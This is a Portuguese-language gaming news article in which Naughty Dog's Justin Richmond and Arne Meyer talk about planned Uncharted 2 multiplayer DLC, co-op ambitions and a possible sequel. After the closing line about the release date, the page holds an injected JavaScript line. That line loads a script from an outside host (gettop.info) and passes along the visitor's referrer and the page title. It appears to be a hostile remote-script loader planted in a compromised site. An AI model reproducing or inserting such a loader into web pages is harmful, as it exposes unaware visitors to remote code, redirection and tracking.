Alguns detalhes sobre o futuro DLC de Uncharted 2

null

O designer do modo multiplayer de Uncharted 2, Justin Richmond, veio a público dizer que está a “trabalhar em conteúdos para o DLC durante os próximos tempos.”

Foi numa conversa com Sony London que Richmond confirmou a existência de conteúdos descarregáveis para o jogo.

Sim, vão existir conteúdos descarregáveis. O que provavelmente vai ser mais visto é algo no modo competitivo: mais mapas, mais modos, algo por ai. Os conteúdos do modo cooperativo consomem bastante mais tempo e o tamanho físico – o tamanho do download – é enorme, portanto isso é capaz de não ser uma opção viável.

Não vou dizer que nunca vão existir conteúdos novos nessa vertente, mas num futuro próximo não iremos fazer isso.

Justin Richmond

Richmond admitiu que está fascinado com o modo cooperativo e “adoraria fazer determinadas coisas no próximo jogo”, agora que o código já está criado.

A Naughty Dog fez um excelente trabalho a definir estas coisas e ainda ninguém fez uma experiência deslumbrante em modo cooperativo e penso que podemos fazer isso, e é algo que em algum momento iremos fazer. Se eu tiver voto na matéria, então é isso que iremos fazer.

Para além de Richmond não ter receio em divulgar informação sobre o jogo, um terceiro capítulo de Uncharted ainda não tem uma confirmação sólida e também não foi possível divulgar que ideias foram descartadas para a história de Uncharted 2 mas “pode existir uma forte possibilidade em usa-las no futuro.”

Existem imensas partes de Drake que ainda não abordamos. Drake é uma óptima personagem e existem imensas coisas acerca do seu passado que nós sabemos e mais ninguém sabe.

Como já referi um terceiro jogo ainda não está confirmado mas Richmond confirmou que os programadores já foram divididos em grupos para melhorarem o motor de jogo. Devido a esta afirmação ele foi questionado se sabia o que o que viria a seguir, ao que ele solta uma gargalhada e menciona que não sabe o que vão fazer a seguir.

Hahaha. Sinceramente, não sei o que vamos fazer a seguir.

Mas, para terminar, o responsável pela comunidade, Arne Meyer, disse:

Estamos a pensar em Uncharted como um franchise e adorávamos trabalhar noutro jogo. Mas tudo depende se for algo novo e do que queremos fazer a seguir.

Uncharted 2 será lançado a 16 de Outubro em exclusivo para a PlayStation 3.

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

CommentLuv badge